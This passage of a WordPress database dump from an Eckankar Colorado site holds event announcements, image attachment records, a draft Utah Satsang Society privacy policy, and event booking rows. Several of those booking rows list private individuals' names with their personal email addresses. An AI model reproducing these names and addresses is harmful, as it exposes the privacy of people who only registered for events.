21:03:09','','mom-boy-comtemplation','','inherit','closed','closed','','mom-boy-comtemplation','','','2022-10-11 15:03:09','2022-10-11 21:03:09','',267309,'https://eckankar-colorado.org/wp-content/uploads/2022/10/mom-boy-comtemplation.jpg',0,'attachment','image/jpeg',0),(267316,0,'2022-10-11 21:42:43','2022-10-12 03:42:43','','','','publish','closed','closed','','267316','','','2022-10-11 21:42:43','2022-10-12 03:42:43','',0,'https://eckankar-colorado.org/nf_sub/267316/',0,'nf_sub','',0),(267320,1000044,'2022-10-16 11:45:00','2022-10-16 17:45:00','','Colleyna Danler - colleynadanler@hotmail.com','','publish','closed','closed','','colleyna-danler-colleynadanlerhotmail-com-3','','','2022-10-16 11:45:00','2022-10-16 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267320',0,'mec-books','',0),(267321,1000044,'2022-10-16 11:45:00','2022-10-16 17:45:00','','Colleyna Danler - colleynadanler@hotmail.com','','publish','closed','closed','','colleyna-danler-colleynadanlerhotmail-com-4','','','2022-10-16 11:45:00','2022-10-16 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267321',0,'mec-books','',0),(267329,1000050,'2022-10-16 11:45:00','2022-10-16 17:45:00','','Sandy(Tarzana California) - sandykarlic@gmail.com','','publish','closed','closed','','sandytarzana-california-sandykarlicgmail-com','','','2022-10-16 11:45:00','2022-10-16 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267329',0,'mec-books','',0),(267330,1000014,'2022-10-16 11:45:00','2022-10-16 17:45:00','','Kery  - keanchico@yahoo.com','','publish','closed','closed','','kery-keanchicoyahoo-com-3','','','2022-10-16 11:45:00','2022-10-16 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267330',0,'mec-books','',0),(267331,1000014,'2022-10-16 11:45:00','2022-10-16 17:45:00','','Kery Colvin  - keanchico@yahoo.com','','publish','closed','closed','','kery-colvin-keanchicoyahoo-com-4','','','2022-10-16 11:45:00','2022-10-16 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267331',0,'mec-books','',0),(267334,2,'2022-10-17 17:26:48','2022-10-17 23:26:48','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">www.TheSoundofSoul.org</a>.</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - Online','','publish','closed','closed','','experience-hu-the-sound-of-soul-online-template','','','2022-10-17 17:30:30','2022-10-17 23:30:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267334',0,'mec-events','',0),(267338,2,'2022-10-19 15:20:57','2022-10-19 21:20:57','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 17pt;\"><strong>Are you ready to give others the freedom that you want for yourself?</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This discussion will give you tools to help you accept others where they are and to love unconditionally. It will include personal stories and techniques that can help you in your daily life.</span></p>\r\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>Our Spiritual Wake-up Calls</em>, \"<strong>Tolerance means if someone doesn’t believe the way you do – in politics, religion, whatever – you let them have their own space. You let them have their own mind.</strong></span>\"</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">“<strong>There are also five virtues—ways to offset the passions: discrimination, forgiveness or tolerance, contentment, detachment, and humility.</strong>”&nbsp; </span><span style=\"font-size: 14pt;\">—Sri Harold Klemp, </span><em><span style=\"font-size: 14pt;\">The Awakening Soul</span></em></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Learn why understanding the five passions of the mind—and the five virtues—will help you master your spiritual destiny. And discover it.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Welcome to All.</span><br>\r\n<span style=\"font-size: 14pt;\">Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/289214055/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'Forgiveness and Tolerance, Keys to Spiritual Living\' Discussion','','publish','closed','closed','','meetup-onlineforgiveness-and-tolerance-keys-to-spiritual-living-discussion','','','2022-10-19 15:37:04','2022-10-19 21:37:04','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267338',0,'mec-events','',0),(267339,2,'2022-10-19 15:10:35','2022-10-19 21:10:35','','group-1','','inherit','closed','closed','','group-1','','','2022-10-19 15:10:35','2022-10-19 21:10:35','',267338,'https://eckankar-colorado.org/wp-content/uploads/2022/10/group-1.jpg',0,'attachment','image/jpeg',0),(267341,2,'2022-10-20 18:00:56','2022-10-21 00:00:56','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The most important point of all is that you are Soul. Know that you are a spark of God and can exist fully only within the realization of that profound truth. As such, you are a light and inspiration to others.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Watch Sri Harold Klemp’s Saturday evening talk at the 2022 ECK Soul Adventure Seminar, which was held October 21 - 23 in Minneapolis, Minnesota.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Sunday, November 20 </span><br>\r\n<span style=\"font-size: 14pt;\">10:30 - 11:30 a.m. </span><br>\r\n<span style=\"font-size: 14pt;\">ECK Temple of Colorado</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to a Harji potluck lunch following the rebroadcast of Sri Harold’s talk on November 20.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>**</strong>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></div>\r\n</div>\r\n</div>\r\n</div>','Video Rebroadcast - In Person<br>\'Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar\'','','publish','closed','closed','','video-rebroadcast-in-personsri-harold-klemp-at-the-2022-eck-soul-adventure-seminar','','','2022-11-12 11:10:05','2022-11-12 18:10:05','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267341',0,'mec-events','',0),(267342,2,'2022-10-20 17:34:56','2022-10-20 23:34:56','','harold-talk-OCT-2022-promo','','inherit','closed','closed','','harold-talk-oct-2022-promo','','','2022-10-20 17:34:56','2022-10-20 23:34:56','',267341,'https://eckankar-colorado.org/wp-content/uploads/2022/10/harold-talk-OCT-2022-promo.jpg',0,'attachment','image/jpeg',0),(267345,2,'2022-10-20 20:57:12','2022-10-21 02:57:12','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are facilitated by an ECK Spiritual Aide, a cleric and longtime member of Eckankar who is specially trained to lead these forums.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All ECK members and the public are welcome.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Roundtable Discussion - In Person<br>\'Creativity and Spiritual Freedom\'','','publish','closed','closed','','roundtable-discussion-in-personcreativity-and-spiritual-freedom','','','2022-10-21 17:07:58','2022-10-21 23:07:58','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267345',0,'mec-events','',0),(267346,2,'2022-10-20 21:06:55','2022-10-21 03:06:55','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div><span class=\"\"><strong><span style=\"font-size: 14pt;\">&nbsp;-- This event is for chelas who have completed \'Arahata Training\' --</span></strong><br>\r\n</span></div>\r\n<div><span class=\"\"><strong>&nbsp;</strong></span></div>\r\n<div>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-left-width: 4px; border-color: #086eac;\">\r\n<p><span style=\"font-size: 14pt;\">\"<em>Every Satsang, every discussion class, and every introductory lecture must show God’s love for Soul. The Master will give this message of love through your words, but mainly through your deeds. The world will look for the grace of the Mahanta in you, so let your heart be pure before God and let your light shine before all.</em>\"<br>\r\n<span style=\"font-size: 12pt;\">—Sri Harold Klemp, <em>ECK Arahata Book</em> (2015 edition), page 2<br>\r\n</span></span></p>\r\n</blockquote>\r\n</div>\r\n<div>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Greetings Arahatas,</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">It’s your year to shine! You are invited to attend one or more Arahata Circles in this new <strong>Spiritual Year of the ECK Teacher</strong>. Arahata Circles offer you the opportunity to share your best practices and current challenges in an open discussion with other Arahatas and will be held quarterly on the third Thursday from 7:00 - 8:00 p.m., beginning in November.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Attendance at an Arahata Circle at least once per year is recommended but not required for all chelas who have completed Arahata Training. You may attend on Zoom or by phone, following the instructions below. Have your ECK Arahata Book available for the discussions.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">This month’s Arahata Circle will be held online via Zoom on the following date and time:</span></strong></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Thursday, November 17</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">7:00 - 8:00 p.m.</span></strong></p>\r\n</div>\r\n<div><span class=\"\" style=\"color: #23507d;\"><strong><span class=\"\" style=\"font-size: 16pt;\">See the current Colorado ‘Chela’ Newsletter for login information.</span></strong></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Colorado/Utah Arahata Circle - Online','','publish','closed','closed','','statewide-arahata-circle-online-template-only-for-member-calendars','','','2022-10-20 21:12:41','2022-10-21 03:12:41','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267346',0,'mec-events','',0),(267350,2,'2022-10-21 17:23:52','2022-10-21 23:23:52','','harold-talk-OCT-2022-promo-2','','inherit','closed','closed','','harold-talk-oct-2022-promo-2','','','2022-10-21 17:23:52','2022-10-21 23:23:52','',267341,'https://eckankar-colorado.org/wp-content/uploads/2022/10/harold-talk-OCT-2022-promo-2.jpg',0,'attachment','image/jpeg',0),(267353,2,'2023-09-17 21:50:44','0000-00-00 00:00:00','<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-about-8 boldgrid-section dynamic-gridblock\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-bottom: 18px;\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<h2 class=\"\" style=\"border-width: 0px; text-align: left; font-family: \'Raleway\'; font-weight: 600; text-transform: capitalize; color: #1e63bc; font-size: 30px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Utah Satsang Society<br>\nPrivacy Policy</h2>\n<p class=\"\" style=\"border-width: 0px; font-size: 16px; font-weight: 600;\" data-font-weight=\"600\"><strong>Effective December 1, 2022</strong></p>\n</div>\n</div>\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 10px;\">\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">What personal information does Utah Satsang Society collect?</h4>\n<p class=\"bg-font-family-alt\" style=\"border-width: 0px;\">Utah Satsang Society collects personally identifying information, such as your name, mailing address, email address, telephone number, and/or credit-card information, if you choose to provide that information by</p>\n<p class=\"bg-font-family-alt\" style=\"border-width: 0px; margin-left: 18px;\">• Signing up to receive email or other mailings from Utah Satsang Society (no credit-card information requested);<br>\n• Preregistering for a seminar or online event;<br>\n• Making an online donation;</p>\n<p class=\"bg-font-family-alt\" style=\"border-width: 0px;\">We also receive your contact information from Eckankar’s parent church in Chanhassen, Minnesota, if you have requested information about local events from the parent church or if you are a member of Eckankar.</p>\n</div>\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\n<p class=\"\"><img class=\"wp-image-267356 size-full aligncenter bg-img bg-img-rounded-top-left bg-img-rounded-top-right\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/10/info-security-1.jpg\" alt=\"\" width=\"685\" height=\"336\"></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Does Utah Satsang Society sell or rent my personal information?</h4>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Absolutely not.</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h3 class=\"\" style=\"border-width: 0px; font-size: 18px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Will I receive unsolicited email from Utah Satsang Society?</h3>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">We do not send unsolicited email.<br>\nYou may unsubscribe from email from us or Eckankar at any time by clicking on the unsubscribe link provided in the email.</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">How is my personal information protected?</h4>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Safeguarding the information you give us is a priority.<br>\nWe take appropriate security measures to protect against loss, misuse, unauthorized access, alteration, disclosure, or destruction of your information.</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h3 class=\"\" style=\"border-width: 0px; font-size: 18px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">How long is my personal information retained?</h3>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Utah Satsang Society keeps your information as long as needed for the purposes outlined in this Privacy Policy, to resolve questions, and as necessary to comply with legal obligations.</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Does Utah Satsang Society share my personal information with others?</h4>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Utah Satsang Society does not share your personal information with others except in the following cases:</p>\n<ul class=\"\">\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">Such information may be shared with authorized leaders of Eckankar to fulfill your requests, administer contact lists, and coordinate activities. All such recipients sign a data-privacy agreement and may only process your personal data for the purposes given in this Privacy Policy and according to local law.<br>\n<br>\n</li>\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">Personal information may be shared as needed with third-party companies for the sole purpose of providing services that help us fulfill your request (e.g., a credit-card processor or a company specializing in emailing services). They are contractually required to provide strict security to the handling of personal information.</li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h3 class=\"\" style=\"border-width: 0px; font-size: 18px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">How can I tell when my online transactions are secure?</h3>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Your browser will show you when you are making a secure transaction in two main ways. When you access a form, a secure connection is indicated when “https” appears in the address bar of your browser. Somewhere in your browser window, you may also see a locked-padlock icon. These indicators tell you that all information entered on that page will be encrypted when you submit the form (e.g., by clicking “Submit,” “Send,” or “Place Order”).</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">How is my credit-card information protected?</h4>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Utah Satsang Society keeps your data secure with end-to-end encryption and tokenization. <br>\nWe receive no credit-card data for transactions made on our website. All donations are done through PayPal. For more information, see PayPal’s <a href=\"https://www.paypal.com/en/webapps/mpp/ua/privacy-full\">Privacy Policy</a>.</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h3 class=\"\" style=\"border-width: 0px; font-size: 18px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Is there any automated data processing on the Utah Satsang Society website?</h3>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Cookies<br>\nA cookie is a small text file that is stored on your computer when you visit a website.</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Utah Satsang Society cookies identify your browser, which sends the cookie to our web server.</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Cookies help us understand how you are using our website. This is purely statistical information and does not track your personal information or your web usage once you leave the Utah Satsang Society site. This information helps us provide a better experience for all users of our website.<br>\n<br>\nA cookie is not harmful to your computer in any way. It cannot be used to spread viruses, nor can it read your hard drive to obtain personal information about you. It is a text file that you can delete at any time. When you revisit our website, we do not access the cookie from the previous session.<br>\n<br>\nYou can navigate the site even if you disable cookies in your browser (most browsers allow cookies by default).</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h3 class=\"\" style=\"border-width: 0px; font-size: 18px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Access logs</h3>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Like all web servers, our web server automatically creates access logs for every visit to our site. Access logs include the time of your visit, the type of browser you are using, the IP address for the computer you are visiting from, and the Web page you came from. {We analyze these logs to help us improve the user experience. We also use Google Analytics for the same purpose.}<br>\n<br>\nThe IP address is not associated with any personally identifying information unless (1) you have filled out any forms on the website and (2) it is necessary to research possible harmful or illegal conduct in connection with the use of our websites, or to comply with the law.</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h3 class=\"\" style=\"border-width: 0px; font-size: 18px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Does Utah Satsang Society collect information from children?</h3>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">No, we do not knowingly collect information from visitors age 17 and under. If you believe your child has provided Utah Satsang Society with their personal information without your permission, please contact us so the information can be removed.</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h3 class=\"\" style=\"border-width: 0px; font-size: 18px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">What are the bases for collecting and using my personal information?</h3>\n<ul class=\"\">\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">Your consent so that we can inform you about Eckankar news and events</li>\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">As necessary to fulfill your requests and transactions</li>\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">As a nonprofit religious organization and church, to administer membership records and matters</li>\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">If required by law or pursuant to legal process or other legal obligation</li>\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">When it is necessary to protect the vital interests of you or another person</li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h3 class=\"\" style=\"border-width: 0px; font-size: 18px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">What are my rights regarding personal information I give to the Utah Satsang Society?</h3>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Utah Satsang Society provides you with reasonable access to the personal information you gave us as well as the ability to review, correct, and delete such personal information to the extent required by law.</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<h3 class=\"\" style=\"border-width: 0px; font-size: 18px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Who do I contact with privacy questions or requests?</h3>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; padding-left: 40px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Utah Satsang Society <br>\nAttn: Privacy Inquiries<br>\nP.O. Box 1422<br>\nSandy, UT, 84091<br>\nContact@Eckankar-Utah.org<br>\n801-542-8070</p>\n</div>\n</div>\n</div>\n</div>','PRIVACY PAGE-NEW UTAH ESC PRIVACY TEXT--WORKING','','draft','closed','closed','','','','','2023-09-17 21:50:44','2023-09-18 03:50:44','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267353',0,'bg_block','',0),(267354,2,'2022-10-22 09:29:54','2022-10-22 15:29:54','','','','publish','closed','closed','','267354','','','2022-10-22 09:29:54','2022-10-22 15:29:54','',0,'https://eckankar-colorado.org/nf_sub/267354/',0,'nf_sub','',0),(267356,2,'2022-10-22 10:08:00','2022-10-22 16:08:00','','info-security-1','','inherit','closed','closed','','info-security-1','','','2022-10-22 10:08:00','2022-10-22 16:08:00','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/10/info-security-1.jpg',0,'attachment','image/jpeg',0),(267368,2,'2022-10-22 21:23:25','2022-10-23 03:23:25','','info-security-2','','inherit','closed','closed','','info-security-2','','','2022-10-22 21:23:25','2022-10-23 03:23:25','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/10/info-security-2.jpg',0,'attachment','image/jpeg',0),(267382,0,'2022-10-24 00:41:36','2022-10-24 06:41:36','','','','publish','closed','closed','','267382','','','2022-10-24 00:41:36','2022-10-24 06:41:36','',0,'https://eckankar-colorado.org/nf_sub/267382/',0,'nf_sub','',0),(267395,1000050,'2022-11-06 10:30:00','2022-11-06 17:30:00','','Sandy(Tarzana California) - sandykarlic@gmail.com','','publish','closed','closed','','sandytarzana-california-sandykarlicgmail-com-2','','','2022-11-06 10:30:00','2022-11-06 